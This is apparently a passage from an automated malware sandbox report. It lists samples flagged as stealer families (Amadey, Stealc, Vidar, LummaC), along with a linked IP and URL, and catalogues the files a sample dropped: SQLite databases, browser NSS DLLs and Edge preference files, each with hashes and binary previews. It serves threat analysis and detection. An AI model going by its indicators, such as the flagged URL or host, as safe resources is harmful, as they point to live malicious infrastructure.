	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.198.118.190
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.118.190
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.198.118.190
	es.hta	Get hash	malicious	Unknown	Browse	20.198.118.190
	https://identitys.fraudguard.es/SSA_Updated_Statement	Get hash	malicious	ScreenConnect Tool	Browse	20.198.118.190
	PDQConnectAgent-4.3.4.msi	Get hash	malicious	Unknown	Browse	20.198.118.190
	SeT_up.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.118.190
	Setup.exe	Get hash	malicious	LummaC	Browse	20.198.118.190

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse

Created / dropped Files

C:\ProgramData\AEGHJKJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2679202604236273
Encrypted:	false
SSDEEP:	384:L/2qOB1nxCkMZSA1LyKOMq+8iP5GDHP/0jMVumI:Kq+n0JZ91LyKOMq+8iP5GLP/0t
MD5:	DE483EA8409E6F5D918E93F128B24435
SHA1:	FCB5189D11F3AC0AA317DC6F9D605D9D902D140C
SHA-256:	9565EA3CB30E982CA8F1B8B718CD52B7FA933765FAB93A40F76C3F62C2B5F65C
SHA-512:	1C82E251665280B74485B3B661D35C0F431E2D7FC8D02F61F788F462B1FC6829C4A4C7D5AE736ED648C2BB91C0F5800CE7A67D48B3C7A4A8C4ED77B6CBAA9002
Malicious:	false
Preview:	SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGCFCFBKFCFCBGDGIEGHJDAFHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCAAEHJDBKJJKFHJEBKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJEGCBGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJEGCBGIDHCAKEBGIIDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJJDHDGDAAKECAKJDAEGCBKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKKEBKJJDGHCBGCAAKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\28693bb4-0ed3-4d01-91ec-c5b3a3c7b07e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46507
Entropy (8bit):	6.086247677803691
Encrypted:	false
SSDEEP:	768:SMkbJrT8IeQc5VKG5LMi1zNts5rEneQEUBY65Dk+bCiofJDSgzMMd6qD47u30+:SMk1rT8H9KGUYlY65bFoftSmd6qE7w
MD5:	55852E801A7D7228FD6565594D8D2B05
SHA1:	7C41C269CD09C7B6C8B696C60AE7CBD5053912D8
SHA-256:	F909C79B611344B4F1FCBB3B7BE6675A4A3E3DF5648DB5B9B86202F177364500
SHA-512:	628D8C0DAB90398389E78B0B18228746972CCCC5DE3BFF7C3BCF9408823E527CDC156A0355FD70059CEB18F307D9A737EF59BE677F4A1F1AD386E554E630E938
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13376815772828130","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"3004d733-dc6a-4114-a54a-8a1908d80e35"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732342177"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\604c7ba0-1462-4e2c-b6cc-5852ccac1294.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6cc4a2e3-2e12-4eac-bc3c-de6f57d663b1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46430
Entropy (8bit):	6.086328914748455
Encrypted:	false
SSDEEP:	768:SMkbJrT8IeQc5dKG5LMi1zNts5rEe9eQEUBY65Dk+bCiofJDSgzMMd6qD47u30+:SMk1rT8H1KGUYeDY65bFoftSmd6qE7w
MD5:	02855E09EC4BA7A36DB8085A43D3FFF5
SHA1:	67EB1C1A61875F83438EFEBD5667461546590A40
SHA-256:	36B44B33314BB0A724F50F903459161FB0CF200E75C55E3400064538B3B54B91
SHA-512:	EB20903108883808F91B95676DCD61D7122E2985EEE396093824B7799AB8DD2EB9FD95AF5E1D782A4E9CD2A67844E47982AA948AE430B284166E9C2EF084043B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13376815772828130","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"3004d733-dc6a-4114-a54a-8a1908d80e35"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732342177"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\74222641-858d-4ed3-8c72-ea3257b22b67.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44996
Entropy (8bit):	6.094932975093256
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4xWeZi1zNts5rEe9eQEUBKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOtYeDKtSmd6qE7lFoC
MD5:	97F026317EA0156BC8D88C2BB3598641
SHA1:	3E8BA41E26746E7CEE99AAA99103F260477057A5
SHA-256:	1BB4666E9400A48A6041279634BCDB65964E2D03250716F76F9A6002665619C7
SHA-512:	28B5DD4F2FB7D0E2AD0C875F90422E0B5E28FD82979145ABBBBEF1B65F1237D489C27D53FDEEF435FF99248ABCB67EE8DEA2855D8D18472B76D1643A556FD594
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\77e43842-496a-4ddb-8ae5-ebbb7293aa3c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	46507
Entropy (8bit):	6.086250205638251
Encrypted:	false
SSDEEP:	768:SMkbJrT8IeQc5V9G5LMi1zNts5rEneQEUBY65Dk+bCiofJDSgzMMd6qD47u30+:SMk1rT8H99GUYlY65bFoftSmd6qE7w
MD5:	26EB2A95B19930B943989041837E8D0A
SHA1:	39A475155A052962730BAA175BC859FE01437B3A
SHA-256:	C412DEB65806272E0615BAF584E7E410C527C9857B33AE0F656CCB237D009AD0
SHA-512:	46B84DC009793D46428F55FBF606EB63F3B733CDAF2BC106F61415BA88254E8EEBB17DCCF2405C02918F098188D56B407F36F891148AEBEDEEA0C81854EAD28D
Malicious:	false
